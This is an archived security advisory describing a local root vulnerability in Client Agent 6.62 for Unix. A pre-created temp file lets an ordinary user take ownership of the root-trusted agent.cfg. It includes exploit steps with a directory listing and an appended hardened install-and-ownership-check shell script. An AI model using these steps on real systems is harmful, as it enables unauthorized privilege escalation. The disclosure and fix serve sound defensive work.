clientagent662.txt

2000-08-31T00:00:00
ID PACKETSTORM:22929
Type packetstorm
Reporter Zorgon
Modified 2000-08-31T00:00:00

Description

                                        
`Client Agent 6.62 for Unix Vulnerability  
Tested on a Debian 2.2.14  
  
Introduction  
--------------  
Client Agent has a hole that allows arbitrary code to be executed as root  
without root's knowledge. However, some conditions must be met to  
exploit this vulnerability.  
  
Description  
------------  
Client Agent is used with ARCserveIT, the backup software. It must be installed  
on all the workstations. A global configuration file, agent.cfg, lists every  
sub-agent installed on your system. This file is in /usr/CYEagent, and receives  
the information from the sub-agent when the script /opt/uagent/uagentsetup is run.  
  
agent.cfg:  
  
debian:/usr/CYEagent# more agent.cfg  
#  
#(c) Copyright 1989-1999 Computer Associates International, Inc.  
#and/or its subsidiaries. All Rights Reserved. Use by the United  
#States Government is subject to RESTRICTED RIGHTS as set out in  
#the license agreement.  
#  
  
[0]  
#[UAGENT]  
NAME Uagent  
VERSION 5.0.0  
HOME /opt/uagent  
#ENV CHEY_ENV_DEBUG_LEVEL=4  
ENV LD_LIBRARY_PATH=/usr/local/CAlib:/usr/CYEagent:$LD_LIBRARY_PATH  
ENV SHLIB_PATH=/usr/local/CAlib:/usr/CYEagent:$SHLIB_PATH  
ENV LIBPATH=/usr/local/CAlib:/usr/CYEagent:$LIBPATH  
BROWSER asbr  
AGENT uagentd  
MERGE umrgd  
VERIFY umrgd  
  
where asbr, uagentd, and umrgd are programs in /opt/uagent  
  
Client Agent is vulnerable only if uagentsetup is run a second time. The first time,  
it creates the folder /usr/CYEagent and the file agent.cfg, but on later runs it makes  
a backup of agent.cfg and creates a new agent.cfg without checking permissions.  
  
The code in /opt/uagent/uagentsetup :  
  
# append lines  
#  
case $ANS in  
y|Y|yes|YES|Yes)  
cat ${UAGENT_HOME}/.agent.cfg >> ${TMPFILE} || exit 2  
${ECHO} >> ${TMPFILE} || exit 2  
mv ${TMPFILE} $dest || exit 2   # <------------ moved into place without checking owner or mode  
;;  
esac  
  
So anyone can control this file. Modifications to this file take effect when  
the sub-agent is stopped and restarted.  
  
Exploit  
--------  
  
[zorgon@debian /]$ cd /tmp  
[zorgon@debian /tmp]$ touch uagent.tmp  
[zorgon@debian /tmp]$ chmod 700 uagent.tmp  
  
If uagentsetup is run a second time :  
  
[zorgon@debian /]$ ls -lag /usr/CYEagent/  
total 176  
drwxr-xr-x 3 root root 4096 Jul 19 17:46 .  
drwxr-xr-x 15 root root 4096 Jul 11 10:37 ..  
-rw-r--r-- 1 zorgon users 618 Jul 19 17:47 agent.cfg  
-rw-r--r-- 1 root root 618 Jul 19 17:47 agent.cfg.old  
-rwxr-xr-x 1 root root 16899 Jul 11 10:37 asagent  
-rwxr-xr-x 1 root root 105280 Jul 11 10:37 asagentd  
lrwxrwxrwx 1 root root 11 Jul 12 10:54 li -> /usr/lib/li  
-rwxr-xr-x 1 root root 27878 Jul 19 17:47 libarclic98_api.so  
drwxr-xr-x 3 root root 4096 Jul 11 10:37 nls  
[zorgon@debian /]$  
  
  
  
==================================  
zorgon <zorgon@linuxstart.com>  
http://www.nightbird.free.fr  
`
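
A hardened form of the append step from uagentsetup quoted in the advisory, together with an ownership check for the resulting agent.cfg. This is an added example, not part of the original advisory or of the vendor's script. The function names are hypothetical, and because the script's definitions of TMPFILE and dest are not shown, the temp file is created next to the destination.

```shell
#!/bin/sh
# Added example, not vendor code. install_cfg and cfg_owner_ok are
# hypothetical names; the files used in the demo are constructed.

# install_cfg SRC DEST
# Same three steps as the excerpt (append, blank line, mv), but the temp
# file is created by mktemp: new, unpredictable name, mode 0600, owned by
# the caller. A file planted beforehand under a fixed name is never reused.
install_cfg() {
    ic_src=$1
    ic_dest=$2
    # The temp file lives in the destination directory (writable only by
    # root in the advisory's listing), so mv is a same-filesystem rename.
    ic_tmp=$(mktemp "$(dirname "$ic_dest")/.agent.cfg.XXXXXX") || return 2
    if cat "$ic_src" >> "$ic_tmp" && echo >> "$ic_tmp" &&
       chmod 644 "$ic_tmp" && mv -f "$ic_tmp" "$ic_dest"; then
        return 0
    fi
    rm -f "$ic_tmp"
    return 2
}

# cfg_owner_ok FILE
# Succeeds only if FILE is a regular file (not a symlink), owned by the
# invoking user (root when called from setup) and not writable by group
# or other. Usable as a check before the agent trusts agent.cfg.
cfg_owner_ok() {
    [ -n "$(find "$1" -prune -type f -user "$(id -u)" \
            ! -perm -020 ! -perm -002 -print 2>/dev/null)" ]
}

# Demo on constructed files in a scratch directory.
demo_dir=$(mktemp -d) || exit 1
printf 'NAME Uagent\nHOME /opt/uagent\n' > "$demo_dir/section.cfg"
install_cfg "$demo_dir/section.cfg" "$demo_dir/agent.cfg"
cfg_owner_ok "$demo_dir/agent.cfg" && echo "agent.cfg: owner and mode OK"
rm -rf "$demo_dir"
```

Run as root against /usr/CYEagent/agent.cfg, cfg_owner_ok fails on a listing like the one in the advisory, where the file is owned by a non-root user.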